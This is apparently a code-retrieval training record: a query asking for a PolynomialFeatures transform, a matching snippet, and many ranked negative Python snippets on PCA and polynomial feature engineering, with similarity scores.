axis=1)[:, np.newaxis]\n model = PCA(n_components=min(droll.shape[0], droll.shape[1])).fit(droll.T)\n\n W = model.components_ # eigenvectors\n V = model.explained_variance_ # eigenvalues\n csum = np.cumsum(V)\n variance_explained = csum / np.sum(V)\n\n return W, V, variance_explained", "def main(desc_key, fxyz, peratom, scale, pca_d, keep_raw=False, output=None, prefix='ASAP'):\n\n if output is None:\n output = prefix + \"-pca-d\" + str(pca_d) + '.xyz'\n peratom = bool(peratom)\n\n # read the xyz file\n frames = ase.io.read(fxyz, ':')\n n_frames = len(frames)\n print('load xyz file: ', fxyz, ', a total of ', str(n_frames), 'frames')\n\n # extract the descriptors from the file\n desc = []\n if n_frames == 1 and not peratom:\n raise RuntimeError('Per-config PCA not possible on a single frame')\n\n # retrieve the SOAP vectors --- both of these throw a ValueError if any are missing or are of wrong shape\n if peratom:\n desc = np.concatenate([a.get_array(desc_key) for a in frames])\n else:\n desc = np.row_stack([a.info[desc_key] for a in frames])\n\n # scale & center\n if scale:\n from sklearn.preprocessing import StandardScaler\n scaler = StandardScaler()\n print('DEBUG: {}'.format(desc.shape))\n print(scaler.fit(desc))\n desc = scaler.transform(desc) # normalizing the features\n\n # fit PCA\n proj, pvec = pca(desc, pca_d)\n # could do with sklearn as well\n # from sklearn.decomposition import PCA\n # pca_sklearn = PCA(n_components=4) # can set svd_solver\n # proj = pca_sklearn.fit_transform(desc)\n # pvec = pca_sklearn.components_\n\n # add coords to info/arrays\n if peratom:\n running_index = 0\n for at in frames:\n n_atoms = len(at)\n at.arrays['pca_coord'] = proj[running_index:running_index + n_atoms, :].copy()\n running_index += n_atoms\n\n if not keep_raw:\n for at in frames:\n del at.arrays[desc_key]\n else:\n for i, at in enumerate(frames):\n at.info['pca_coord'] = proj[i]\n\n if not keep_raw:\n for at in frames:\n del at.info[desc_key]\n\n # save\n ase.io.write(output, frames, write_results=False)", "def preprocess(train_dataset, test_dataset):\n pca = PCA(n_components=20)\n pca.fit(train_dataset)\n train_dataset = pca.transform(train_dataset)\n test_dataset = pca.transform(test_dataset)\n return train_dataset, test_dataset", "def project_to_eigenvectors(X, vecs):\n\n return (X-np.mean(X, axis=0)).dot(np.transpose(vecs)) #PCA assumes that the data is centered, so we need to do that before doing the calculations", "def run_pca(data_file, rs, n_components, outfile1, outfile2):\n print('running PCA with n_components={}'.format(n_components))\n day_batcher = DayBatcher(data_file, skiprow=1, delimiter=' ')\n mat = day_batcher.next_batch()\n rst = []\n while mat is not None:\n if mat.shape[1] == 13:\n # use compact10d\n datadict = {'features': mat[:, 3:],\n 'red': mat[:, 2],\n 'user': mat[:, 1],\n 'day': mat[:, 0]}\n else:\n # use all_fixed\n datadict = {'features': mat[:, 14:],\n 'red': mat[:, 13],\n 'user': mat[:, 1],\n 'day': mat[:, 0]}\n batch = scale(datadict['features'])\n pca = PCA(n_components=n_components, random_state=rs)\n pca.fit(batch)\n data_reduced = np.dot(batch, pca.components_.T) # pca transform\n data_original = np.dot(data_reduced, pca.components_) # inverse_transform\n pointloss = np.mean(np.square(batch - data_original), axis=1)\n loss = np.mean(pointloss)\n for d, u, t, l, in zip(datadict['day'].tolist(),\n datadict['user'].tolist(),\n datadict['red'].tolist(),\n pointloss.flatten().tolist()):\n rst.append((u, d, l, t))\n mat = day_batcher.next_batch()\n train_rst, 
test_rst = split_train_test(rst)\n save_rst(train_rst, outfile1)\n save_rst(test_rst, outfile2)\n eval_cr(test_rst, 'pca')", "def pca(self, name=\"\", display=True, saveFile = False, saveFig = False, fileLocation=\"\", fullscreen=False):\n if fileLocation == '':\n fileLocation = self.fileLocation\n try:\n return modules.pca(self.experimentFullIntersection.copy(), self.cellLines, self.timePoints, self.secondTimePoints, name, display, saveFile, saveFig, fileLocation, fullscreen, self.colors)\n except AttributeError:\n print(\"ERROR: Combine replicates first.\")", "def fill_pipeline():\n\n # m1_pca = PCA()\n m1_pca = PCA(svd_solver='randomized', whiten=True) # 与官网里子一致的后2个参数,否则分数很差\n # m1_pca.fit(X_train)\n\n m2_svc = SVC(kernel='rbf', class_weight='balanced')\n\n pipe = Pipeline(steps=[('pca', m1_pca),\n ('svc', m2_svc)])\n print('\\n===================原 estimator')\n pprint(pipe.named_steps)\n return pipe", "def get_pca_variances(self):\n return self.get_pca_images()[3]", "def get_pca_images(self):\n mean_vector, principal_components, variances = self.pca()\n shape = self.image_shape + (principal_components.shape[1],)\n principal_component_images = principal_components.reshape(shape)\n principal_component_images = np.moveaxis(\n principal_component_images, -1, 0)\n mean_beam = mean_vector.reshape(self.image_shape)\n mask = self.mask.reshape(self.image_shape)\n return mean_beam, mask, principal_component_images, variances", "def build(self, data: np.ndarray):\n ret = data.dot(self.eigenvectors)\n self.pca_predictor_vars = ret\n return ret", "def optimize_pca(X,Y):\n # {0, 10, 20, ..., 590} \n for n in range(0,599,10):\n \n #Fit PCA\n pca = PCA(n_components=n).fit(X)\n # Plot variance\n pylab.scatter(n, sum(pca.explained_variance_ratio_))\n \n #Place 95% line.\n pylab.axhline(y=0.95, color='r')", "def _pca(self):\n mean_beam = np.mean(self.beam_images, axis=1, keepdims=False)\n mask = self.mask\n beam_images = self.beam_images[:, :self.n_beam_images]\n\n # Subtract mean_beam from images and apply the mask. Element-wise\n # multiplication and subtraction using numpy broadcasting (as commented\n # out below) requires 3 large matrices in memory at an intermediate\n # point in the computation, namely right after (beam_images -\n # mean_beam_2d) is evaluated and memory for centered_masked_images is\n # allocated.\n # mask_2d = mask[:,np.newaxis]\n # mean_beam_2d = mean_beam[:,np.newaxis]\n # centered_masked_images = mask_2d * (beam_images - mean_beam_2d)\n\n # Instead of that direct approach, use self._center_and_mask_numba() or\n # self._center_and_mask_in_place(). 
As of this writing the _in_place\n # version is faster, but this may change in the future since the numba\n # version supports parallelization.\n centered_masked_images = self._center_and_mask_in_place(\n beam_images,\n mask,\n mean_beam,\n )\n # centered_masked_images should be C-contiguous already but it's good to\n # make sure.\n centered_masked_images = np.ascontiguousarray(centered_masked_images)\n\n # Compute the masked principal components\n # -1 since last eigenvector isn't necessarily orthogonal to the others.\n n_eigs = min(self.n_beam_images - 1, self.max_principal_components)\n n_eigs = max(n_eigs, 1) # Need at least one.\n # .T means transpose, @ means matrix multiplication.\n cov_mat = centered_masked_images.T @ centered_masked_images\n del centered_masked_images # Free up memory.\n if self.use_sparse_routines:\n variances, principal_components = eigsh(\n cov_mat, k=n_eigs, which='LM')\n else:\n eigvals_param = (\n self.n_beam_images - n_eigs,\n self.n_beam_images - 1)\n # overwrite_a might reduce memory usage\n variances, principal_components = eigh(\n cov_mat, eigvals=eigvals_param, overwrite_a=True)\n del cov_mat # Free up memory.\n\n # Reverse ordering to put largest eigenvectors/eigenvalues first\n principal_components = np.fliplr(principal_components)\n variances = np.flip(variances)\n\n # principal_components isn't always C-contiguous, and when it's not the\n # matrix multiplication below becomes extremely slow. It's much faster\n # to make it C-contiguous first so that numpy can use faster matrix\n # multiplication routines behind the scenes.\n principal_components = np.ascontiguousarray(principal_components)\n\n # Construct the un-masked basis vectors.\n centered_images = beam_images - mean_beam[:, np.newaxis]\n # centered_images should be C-contiguous already but it's good to make\n # sure.\n centered_images = np.ascontiguousarray(centered_images)\n principal_components = centered_images @ principal_components\n del centered_images # Free up memory.\n\n # As of this writing, self._normalize_vectorized() is faster than using\n # self._normalize_numba() despite the fact that the latter is uses numba\n # and allows for parallelization. 
That may change in the future though.\n principal_components = self._normalize_vectorized(\n principal_components,\n mask,\n )\n\n return mean_beam, principal_components, variances", "def decomposition_method(matrix):\n x, y, z = 0, 1, 2 # indices\n K = np.array([\n [R[x, x]-R[y, y]-R[z, z], R[y, x]+R[x, y], R[z, x]+R[x, z], R[y, z]-R[z, y]],\n [R[y, x]+R[x, y], R[y, y]-R[x, x]-R[z, z], R[z, y]+R[y, z], R[z, x]-R[x, z]],\n [R[z, x]+R[x, z], R[z, y]+R[y, z], R[z, z]-R[x, x]-R[y, y], R[x, y]-R[y, x]],\n [R[y, z]-R[z, y], R[z, x]-R[x, z], R[x, y]-R[y, x], R[x, x]+R[y, y]+R[z, z]]\n ])\n K = K / 3.0\n\n e_vals, e_vecs = np.linalg.eig(K)\n print('Eigenvalues:', e_vals)\n print('Eigenvectors:', e_vecs)\n max_index = np.argmax(e_vals)\n principal_component = e_vecs[max_index]\n return principal_component", "def parcellate_PCA(matrix, mat_type, path_pref, rot='quartimax', eigval_thr=1):\n if rot == 'quartimax':\n rotation = 0.0\n elif rot == 'varimax':\n rotation = 1.0\n else:\n raise Exception('This factor rotation type is not handled')\n # To have more than just a reference of matrix in mat\n mat = matrix + 0\n # Get the eigenvalues and eigenvectors of the\n # mat = cov(2D_connectivity_matrix)\n # gamma_eigval, omega_eigvec = np.linalg.eig(mat)\n u, gamma_eigval, omega = np.linalg.svd(mat, full_matrices=True)\n # SVD third output is the transposed of the eigen vectors\n omega_eigvec = omega.T\n if mat_type == \"covariance\":\n comp_thr = eigval_thr * np.mean(gamma_eigval)\n elif mat_type == \"correlation\":\n comp_thr = eigval_thr\n else:\n raise Exception('This factor rotation type is not handled')\n\n # Sort the Gamma_eigval in decreasing order of magnitude, and sort\n # the order of the eigenvectors accordingly\n indsort = np.argsort(gamma_eigval)[::-1]\n\n # The SSQ_loadings is equal to the eigenvalues of the SM (cov(data))\n # They correspond to the values in the 'Extraction Sum of Squared\n # loadings' in SPSS\n gamma_eigval_sort = gamma_eigval[indsort]\n omega_eigvec_sort = omega_eigvec[:,indsort]\n\n # We keep only the components which have an eigenvalue above comp_thr\n keep = np.where(gamma_eigval_sort > comp_thr)\n ind = 0\n while gamma_eigval_sort[ind] > comp_thr:\n ind += 1\n gamma_eigval_sort = gamma_eigval_sort[:ind]\n omega_eigvec_sort = omega_eigvec_sort[:,:ind]\n\n SSQ_loadings = gamma_eigval_sort\n # The matrix of factor laodings (like in SPSS)\n Lambda = omega_eigvec_sort.dot(np.diag(np.sqrt(np.abs(gamma_eigval_sort))))\n print(pd.DataFrame(Lambda))\n # SPSS: The rescaled loadings matrix\n Lambda_rescaled = np.dot(np.sqrt(np.diag(np.diag(cov))), Lambda)\n\n # SPSS: communalities\n h = [np.sum(gamma_eigval*(omega_eigvec[i]**2)) for i in range(len(omega_eigvec))]\n\n lambda_rot = rotate_components(Lambda, q = 1000, gamma=rotation)\n print(pd.DataFrame(lambda_rot))\n # Get sum of squared loadings\n SSQ_loadings_rot = np.sum(lambda_rot**2, axis=0)\n print(pd.DataFrame(SSQ_loadings_rot))\n # Sort the SSQ_loadings_rot in descending order to prepare for the\n # power fitting\n SSQ_loadings_rot_sorted = np.sort(SSQ_loadings_rot)\n SSQ_loadings_rot_sorted_descending = SSQ_loadings_rot_sorted[::-1]\n\n # --------------------------------------------------------------------------\n # (5) Fit a power law to the sorted SSQ_Loadings_rot to Estimate\n # the number of relevant factors Npc using the fitpower function in\n # do_PCA_utilities.py (only the first 50 SSQ_Loadings are considered).\n # Returns the number of components to consider: Npc\n # 
--------------------------------------------------------------------------\n npc = fit_power(SSQ_loadings_rot_sorted_descending)\n print('\\n Power fitting of the eigenvalues associated with the rotated')\n print('loadings estimated the presence of ' + str(npc) + ' clusters \\n')\n\n\n # --------------------------------------------------------------------------\n # (6) Rotate Lambda_Npc = Lambda[:,Npc]\n # Returns the final Factor loadings, defining the clusters\n # --------------------------------------------------------------------------\n lambda_npc = Lambda[:, 0:npc]\n\n return (lambda_rot, npc)\n # return (lambda_npc, npc)", "def localpca(arr, sigma, mask=None, pca_method='eig', patch_radius=2,\n tau_factor=2.3, out_dtype=None):\n if mask is None:\n # If mask is not specified, use the whole volume\n mask = np.ones_like(arr, dtype=bool)[..., 0]\n\n if out_dtype is None:\n out_dtype = arr.dtype\n\n # We retain float64 precision, iff the input is in this precision:\n if arr.dtype == np.float64:\n calc_dtype = np.float64\n # Otherwise, we'll calculate things in float32 (saving memory)\n else:\n calc_dtype = np.float32\n\n if not arr.ndim == 4:\n raise ValueError(\"PCA denoising can only be performed on 4D arrays.\",\n arr.shape)\n\n if pca_method.lower() == 'svd':\n is_svd = True\n elif pca_method.lower() == 'eig':\n is_svd = False\n else:\n raise ValueError(\"pca_method should be either 'eig' or 'svd'\")\n\n patch_size = 2 * patch_radius + 1\n\n if patch_size ** 3 < arr.shape[-1]:\n e_s = \"You asked for PCA denoising with a \"\n e_s += \"patch_radius of {0} \".format(patch_radius)\n e_s += \"for data with {0} directions. \".format(arr.shape[-1])\n e_s += \"This would result in an ill-conditioned PCA matrix. \"\n e_s += \"Please increase the patch_radius.\"\n raise ValueError(e_s)\n\n if isinstance(sigma, np.ndarray):\n if not sigma.shape == arr.shape[:-1]:\n e_s = \"You provided a sigma array with a shape\"\n e_s += \"{0} for data with\".format(sigma.shape)\n e_s += \"shape {0}. 
Please provide a sigma array\".format(arr.shape)\n e_s += \" that matches the spatial dimensions of the data.\"\n raise ValueError(e_s)\n\n tau = np.median(np.ones(arr.shape[:-1]) * ((tau_factor * sigma) ** 2))\n\n theta = np.zeros(arr.shape, dtype=calc_dtype)\n thetax = np.zeros(arr.shape, dtype=calc_dtype)\n\n # loop around and find the 3D patch for each direction at each pixel\n for k in range(patch_radius, arr.shape[2] - patch_radius):\n for j in range(patch_radius, arr.shape[1] - patch_radius):\n for i in range(patch_radius, arr.shape[0] - patch_radius):\n # Shorthand for indexing variables:\n if not mask[i, j, k]:\n continue\n ix1 = i - patch_radius\n ix2 = i + patch_radius + 1\n jx1 = j - patch_radius\n jx2 = j + patch_radius + 1\n kx1 = k - patch_radius\n kx2 = k + patch_radius + 1\n\n X = arr[ix1:ix2, jx1:jx2, kx1:kx2].reshape(\n patch_size ** 3, arr.shape[-1])\n # compute the mean and normalize\n M = np.mean(X, axis=0)\n # Upcast the dtype for precision in the SVD\n X = X - M\n\n if is_svd:\n # PCA using an SVD\n U, S, Vt = svd(X, *svd_args)[:3]\n # Items in S are the eigenvalues, but in ascending order\n # We invert the order (=> descending), square and normalize\n # \\lambda_i = s_i^2 / n\n d = S[::-1] ** 2 / X.shape[0]\n # Rows of Vt are eigenvectors, but also in ascending\n # eigenvalue order:\n W = Vt[::-1].T\n\n else:\n # PCA using an Eigenvalue decomposition\n C = np.transpose(X).dot(X)\n C = C / X.shape[0]\n [d, W] = eigh(C, turbo=True)\n\n # Threshold by tau:\n W[:, d < tau] = 0\n # This is equations 1 and 2 in Manjon 2013:\n Xest = X.dot(W).dot(W.T) + M\n Xest = Xest.reshape(patch_size,\n patch_size,\n patch_size, arr.shape[-1])\n # This is equation 3 in Manjon 2013:\n this_theta = 1.0 / (1.0 + np.sum(d > 0))\n theta[ix1:ix2, jx1:jx2, kx1:kx2] += this_theta\n thetax[ix1:ix2, jx1:jx2, kx1:kx2] += Xest * this_theta\n\n denoised_arr = thetax / theta\n denoised_arr.clip(min=0, out=denoised_arr)\n denoised_arr[~mask] = 0\n return denoised_arr.astype(out_dtype)", "def fitPCAimg(coef=None, data = None, maxcomp = None):\n img = data[:,2:].T\n size = np.sqrt(img.shape[0])\n pca = PCA(n_components=20)\n imgBasis = pca.fit_transform(img)\n nimg = img.shape[1]" ]
[ "0.76003706", "0.74183345", "0.73857856", "0.73070925", "0.7215321", "0.7163089", "0.7066037", "0.7064292", "0.7050474", "0.7049609", "0.70191026", "0.7006228", "0.6999517", "0.6968802", "0.6924137", "0.68874854", "0.6884852", "0.68622917", "0.67792535", "0.6774958", "0.67328346", "0.6731503", "0.67106754", "0.6646318", "0.66424024", "0.6629324", "0.6629324", "0.66278887", "0.6620293", "0.656829", "0.6568242", "0.65431094", "0.64816594", "0.64641756", "0.6462149", "0.64621353", "0.64593846", "0.6445568", "0.64274436", "0.6423294", "0.64142644", "0.6400075", "0.6375266", "0.6355939", "0.6342307", "0.633416", "0.62999135", "0.62969387", "0.6288508", "0.6285619", "0.62753546", "0.6267883", "0.6249952", "0.6171575", "0.6133782", "0.61015755", "0.60853547", "0.6080211", "0.6041711", "0.6033251", "0.60299796", "0.60087633", "0.5995187", "0.5993922", "0.59525", "0.5931811", "0.5922845", "0.59215707", "0.59067136", "0.58946884", "0.58754206", "0.58510256", "0.58284557", "0.582486", "0.582463", "0.5822558", "0.57833594", "0.57742107", "0.5755756", "0.57553977", "0.575462", "0.5740764", "0.5738497", "0.57147545", "0.57127637", "0.5700029", "0.5676018", "0.5673367", "0.5657765", "0.5651388", "0.5643576", "0.5641714", "0.563302", "0.5632618", "0.56120235", "0.559947", "0.5590898", "0.55902016", "0.55848026", "0.557837" ]
0.84510195
0
get a PolynomialFeatures transform
def get_poly(kwargs):
    from sklearn.preprocessing import PolynomialFeatures
    return PolynomialFeatures(**kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def generate_polynomial_features(self, X) :\n\n n,d = X.shape\n\n ### ========== TODO : START ========== ###\n # part b: modify to create matrix for simple linear model\n # part g: modify to create matrix for polynomial model\n Phi = X\n m = self.m_\n\n if m == 1:\n Phi = np.zeros((n,2))\n for i in range(n):\n Phi[i,0] = 1\n Phi[i, 1] = X[i]\n\n else:\n Phi = np.ones((n,m+1))#n*m+1 dimmension\n power_arr = np.arange(0, m+1)\n for index, row in enumerate(Phi):# get every row\n row = np.repeat(X[index],m+1)\n row = np.power(row,power_arr)\n Phi [index,] = row\n #also could use the following\n \"\"\"\n import sklearn.preprocessing as sk\n #X is a N*1 vector\n poly_mat = sk.PolynomialFeatures(3)\n poly.fit_transform(a)\n \"\"\"\n\n\n\n\n\n ### ========== TODO : END ========== ###\n\n return Phi", "def polyfeatures(self, X, degree):\n #TODO\n \n for d in range(2,degree+1):\n X = np.append(X,X[:,[0]]**d,1)\n \n return X", "def polyFeat(X, p):\r\n # You need to return the following variables correctly.\r\n X_poly = np.zeros((X.shape[0], p))\r\n\r\n # ====================== YOUR CODE HERE ======================\r\n\r\n for i in range(p):\r\n X_poly[:, i] = X[:, 0] ** (i + 1)\r\n\r\n # ============================================================\r\n return X_poly", "def _make_features(self, x):\n\t\tx = x.unsqueeze(1)\n\t\treturn torch.cat([x ** i for i in range(1, self._degree+1)], 1)", "def make_features(x):\n x = x.unsqueeze(1)\n # torch.cat 实现tensor拼接\n return torch.cat([x ** i for i in range(1, POLY_DEGREE + 1)], 1)", "def build_poly_by_feature(tx, degrees):\n poly_tempt = np.ones([tx.shape[0],1])\n for idx, degree in enumerate(degrees):\n feature_poly = build_poly(tx[:,idx], int(degree))\n poly_tempt = np.c_[poly_tempt, feature_poly[:,1:]]\n return poly_tempt", "def build_poly(x, degree):\n \"\"\"\n Assemble the 3 label vectors with the original ordering \n Inputs:\n - x (ndarray) : binary prediction for set 1\n - degree (int) : binary prediction for set 2 \n Outputs: \n - p (ndarray) : predicted labels for test set ( with the original ordering)\n \"\"\"\n # forming a matrix containing the data points\n terms = np.hstack([np.ones([x.shape[0],1]),np.tile(x,(1,degree))])\n index = np.arange(degree)+1\n \n # forming a matrix contnaining the exponents\n exponents = np.multiply(np.ones((1, x.shape[1])), index[:, np.newaxis])\n exponents = exponents.reshape([1, x.shape[1]*degree])\n exponents = np.multiply(exponents, np.ones([x.shape[0], 1]))\n exponents = np.hstack([np.ones( (x.shape[0], 1) ),exponents])\n \n # using the exponent matrix as the element-wise exponents of the terms in the terms matrix\n p=np.power(terms,exponents)\n return p", "def feature_extraction(self) -> None:\n # Add the hour, minute, and x column to the data\n self.df_poly[\"hour\"] = self.df_poly[\"time\"].apply(lambda y: y.hour)\n self.df_poly[\"minute\"] = self.df_poly[\"time\"].apply(lambda y: y.minute)\n self.df_poly[\"x\"] = self.df_poly[\"hour\"] * 60 + self.df_poly[\"minute\"]\n\n # Empty list to hold the feature names\n poly_feature_names = []\n\n # Add the poly columns to the df_poly\n for degree in [0, 1, 2, 3, 4, 5]:\n self.df_poly = poly(self.df_poly, degree)\n poly_feature_names.append(\"poly_\" + str(degree))\n\n # filterout + - inf, nan\n self.df_poly = self.df_poly[\n ~self.df_poly.isin([np.nan, np.inf, -np.inf]).any(1)\n ]\n\n # Save the poly feature name\n self.poly_feature_names = poly_feature_names\n feature_names = []\n\n 
#########################################################################################\n train_index_poly = self.df_poly[\n ~self.df_poly.isin([np.nan, np.inf, -np.inf]).any(1)\n ].index\n X_train_poly, y_train_poly = (\n self.df_poly[self.poly_feature_names].loc[train_index_poly],\n self.df_poly[\"y\"].loc[train_index_poly],\n )\n\n # Build the Polynomial Regression Model\n lin_reg = LinearRegression()\n lin_reg.fit(X_train_poly, y_train_poly)\n self.poly_model = lin_reg\n y_train_season = lin_reg.predict(X_train_poly)\n self.y_train_season_obj = y_train_season\n #########################################################################################\n\n for n in [10, 15, 20, 25, 30]:\n self.df = MOM(self.df, n)\n feature_names.append(\"MOM_\" + str(n))\n for n in [10, 15, 20, 25, 30]:\n self.df = ROC(self.df, n)\n feature_names.append(\"ROC_\" + str(n))\n for n in [1, 2, 3, 4, 5]:\n self.df = LAG(self.df, n)\n feature_names.append(\"LAG_\" + str(n))\n for n in [10, 20, 30]:\n self.df = MA(self.df, n)\n feature_names.append(\"MA_\" + str(n))\n\n self.df = self.df[\n ~self.df.isin([np.nan, np.inf, -np.inf]).any(1)\n ] # filterout + - inf, nan\n self.feature_names = feature_names", "def polynomial_basis(X, degree):\n n_samples, n_features = X.shape\n\n # The number of monomials is (n + d) choose d\n n_monomials = int(factorial(n_features + degree)/(factorial(n_features)*factorial(degree)))\n features = np.ones((n_monomials, n_samples))\n col = 1\n x_T = X.T\n\n for deg in range(1, degree + 1):\n for combs in combinations_with_replacement(x_T, deg):\n features[col, :] = reduce(lambda x, y: x * y, combs)\n col += 1\n return features.T", "def toyData(w,sigma,N): \n #Degree of polynomial \n degree=w.size; \n \n #generate x values \n x=np.linspace(0, 1,N);\n \n poly=preprocessing.PolynomialFeatures(degree-1,include_bias=True)\n \n PHI=poly.fit_transform(x.reshape(N,1)) \n \n y=np.dot(PHI,w);\n \n target=y+np.random.normal(0, sigma, N);\n \n Out=[x,y,PHI, target]\n\n return Out", "def map_feature(x):\n m, n = x.shape\n out = x\n\n # Add quodratic features.\n for i in range(n):\n for j in range(i, n):\n out = hstack((out, x[:, i].reshape(m, 1) * x[:, j].reshape(m, 1)))\n\n # Add cubic features.\n for i in range(n):\n for j in range(i, n):\n for k in range(j, n):\n out = hstack(\n (out, x[:, i].reshape(m, 1) * x[:, j].reshape(m, 1) * x[:, k].reshape(m, 1)))\n return out", "def add_polynomial_features(x, power):\n if type(power) is int and type(x) is np.ndarray:\n return np.concatenate([x**i for i in range(1, power+1)], axis=1)\n return None", "def polytrans(features,features_test,features_oos,poly): \n \n features['FEMA_21'] = poly.fit_transform(np.nan_to_num(features.FEMA_21.astype(np.float32)).reshape(-1, 1))\n features['FEMA_8'] = poly.fit_transform(np.nan_to_num(features.FEMA_8.astype(np.float32)).reshape(-1, 1))\n features['FADRLo'] = poly.fit_transform(np.nan_to_num(features.FADRLo.astype(np.float32)).reshape(-1, 1))\n features['FADRHi'] = poly.fit_transform(np.nan_to_num(features.FADRHi.astype(np.float32)).reshape(-1, 1))\n features['FRVI40'] = poly.fit_transform(np.nan_to_num(features.FRVI40.astype(np.float32)).reshape(-1, 1))\n features['FRVI60'] = poly.fit_transform(np.nan_to_num(features.FRVI60.astype(np.float32)).reshape(-1, 1))\n features['FONLOSMA5'] = poly.fit_transform(np.nan_to_num(features.FONLOSMA5.astype(np.float32)).reshape(-1, 1))\n features['FONHISMA5'] = poly.fit_transform(np.nan_to_num(features.FONHISMA5.astype(np.float32)).reshape(-1, 1))\n features['FONLOSMA21'] = 
poly.fit_transform(np.nan_to_num(features.FONLOSMA21.astype(np.float32)).reshape(-1, 1))\n features['FONHISMA21'] = poly.fit_transform(np.nan_to_num(features.FONHISMA21.astype(np.float32)).reshape(-1, 1))\n features['FONLOSMA34'] = poly.fit_transform(np.nan_to_num(features.FONLOSMA34.astype(np.float32)).reshape(-1, 1))\n features['FSBGAMMA'] = poly.fit_transform(np.nan_to_num(features.FSBGAMMA.astype(np.float32)).reshape(-1, 1))\n features['FOPENWEEKLY'] = poly.fit_transform(np.nan_to_num(features.FOPENWEEKLY.astype(np.float32)).reshape(-1, 1))\n features['FHIGHWEEKLY'] = poly.fit_transform(np.nan_to_num(features.FHIGHWEEKLY.astype(np.float32)).reshape(-1, 1))\n features['FLOWWEEKLY'] = poly.fit_transform(np.nan_to_num(features.FLOWWEEKLY.astype(np.float32)).reshape(-1, 1))\n features['FCLOSEWEEKLY'] = poly.fit_transform(np.nan_to_num(features.FCLOSEWEEKLY.astype(np.float32)).reshape(-1, 1))\n features['FOPENDAILY'] = poly.fit_transform(np.nan_to_num(features.FOPENDAILY.astype(np.float32)).reshape(-1, 1))\n features['FHIGHDAILY'] = poly.fit_transform(np.nan_to_num(features.FHIGHDAILY.astype(np.float32)).reshape(-1, 1))\n features['FLOWDAILY'] = poly.fit_transform(np.nan_to_num(features.FLOWDAILY.astype(np.float32)).reshape(-1, 1))\n features['FCLOSEDAILY'] = poly.fit_transform(np.nan_to_num(features.FCLOSEDAILY.astype(np.float32)).reshape(-1, 1))\n features['FOPENHOURLY'] = poly.fit_transform(np.nan_to_num(features.FOPENHOURLY.astype(np.float32)).reshape(-1, 1))\n features['FHIGHHOURLY'] = poly.fit_transform(np.nan_to_num(features.FHIGHHOURLY.astype(np.float32)).reshape(-1, 1))\n features['FLOWHOURLY'] = poly.fit_transform(np.nan_to_num(features.FLOWHOURLY.astype(np.float32)).reshape(-1, 1))\n features['FCLOSEHOURLY'] = poly.fit_transform(np.nan_to_num(features.FCLOSEHOURLY.astype(np.float32)).reshape(-1, 1))\n features['FSMA200'] = poly.fit_transform(np.nan_to_num(features.FSMA200.astype(np.float32)).reshape(-1, 1))\n features['FBOLUP20'] = poly.fit_transform(np.nan_to_num(features.FBOLUP20.astype(np.float32)).reshape(-1, 1))\n features['FPP'] = poly.fit_transform(np.nan_to_num(features.FPP.astype(np.float32)).reshape(-1, 1))\n features['FS38'] = poly.fit_transform(np.nan_to_num(features.FS38.astype(np.float32)).reshape(-1, 1))\n features['FS62'] = poly.fit_transform(np.nan_to_num(features.FS62.astype(np.float32)).reshape(-1, 1))\n features['FS100'] = poly.fit_transform(np.nan_to_num(features.FS100.astype(np.float32)).reshape(-1, 1))\n features['FS138'] = poly.fit_transform(np.nan_to_num(features.FS138.astype(np.float32)).reshape(-1, 1))\n features['FR162'] = poly.fit_transform(np.nan_to_num(features.FS162.astype(np.float32)).reshape(-1, 1))\n features['FS200'] = poly.fit_transform(np.nan_to_num(features.FS200.astype(np.float32)).reshape(-1, 1))\n features['FR38'] = poly.fit_transform(np.nan_to_num(features.FR38.astype(np.float32)).reshape(-1, 1))\n features['FR62'] = poly.fit_transform(np.nan_to_num(features.FR62.astype(np.float32)).reshape(-1, 1))\n features['FR100'] = poly.fit_transform(np.nan_to_num(features.FR100.astype(np.float32)).reshape(-1, 1))\n features['FR138'] = poly.fit_transform(np.nan_to_num(features.FR138.astype(np.float32)).reshape(-1, 1))\n features['FR162'] = poly.fit_transform(np.nan_to_num(features.FR162.astype(np.float32)).reshape(-1, 1))\n features['FR200'] = poly.fit_transform(np.nan_to_num(features.FR200.astype(np.float32)).reshape(-1, 1))\n features['SBATR'] = poly.fit_transform(np.nan_to_num(features.SBATR.astype(np.float32)).reshape(-1, 1))\n \n 
features_test['FEMA_21'] = poly.fit_transform(np.nan_to_num(features_test.FEMA_21.astype(np.float32)).reshape(-1, 1))\n features_test['FEMA_8'] = poly.fit_transform(np.nan_to_num(features_test.FEMA_8.astype(np.float32)).reshape(-1, 1))\n features_test['FADRLo'] = poly.fit_transform(np.nan_to_num(features_test.FADRLo.astype(np.float32)).reshape(-1, 1))\n features_test['FADRHi'] = poly.fit_transform(np.nan_to_num(features_test.FADRHi.astype(np.float32)).reshape(-1, 1))\n features_test['FRVI40'] = poly.fit_transform(np.nan_to_num(features_test.FRVI40.astype(np.float32)).reshape(-1, 1))\n features_test['FRVI60'] = poly.fit_transform(np.nan_to_num(features_test.FRVI60.astype(np.float32)).reshape(-1, 1))\n features_test['FONLOSMA5'] = poly.fit_transform(np.nan_to_num(features_test.FONLOSMA5.astype(np.float32)).reshape(-1, 1))\n features_test['FONHISMA5'] = poly.fit_transform(np.nan_to_num(features_test.FONHISMA5.astype(np.float32)).reshape(-1, 1))\n features_test['FONLOSMA21'] = poly.fit_transform(np.nan_to_num(features_test.FONLOSMA21.astype(np.float32)).reshape(-1, 1))\n features_test['FONHISMA21'] = poly.fit_transform(np.nan_to_num(features_test.FONHISMA21.astype(np.float32)).reshape(-1, 1))\n features_test['FONLOSMA34'] = poly.fit_transform(np.nan_to_num(features_test.FONLOSMA34.astype(np.float32)).reshape(-1, 1))\n features_test['FSBGAMMA'] = poly.fit_transform(np.nan_to_num(features_test.FSBGAMMA.astype(np.float32)).reshape(-1, 1))\n features_test['FOPENWEEKLY'] = poly.fit_transform(np.nan_to_num(features_test.FOPENWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_test['FHIGHWEEKLY'] = poly.fit_transform(np.nan_to_num(features_test.FHIGHWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_test['FLOWWEEKLY'] = poly.fit_transform(np.nan_to_num(features_test.FLOWWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_test['FCLOSEWEEKLY'] = poly.fit_transform(np.nan_to_num(features_test.FCLOSEWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_test['FOPENDAILY'] = poly.fit_transform(np.nan_to_num(features_test.FOPENDAILY.astype(np.float32)).reshape(-1, 1))\n features_test['FHIGHDAILY'] = poly.fit_transform(np.nan_to_num(features_test.FHIGHDAILY.astype(np.float32)).reshape(-1, 1))\n features_test['FLOWDAILY'] = 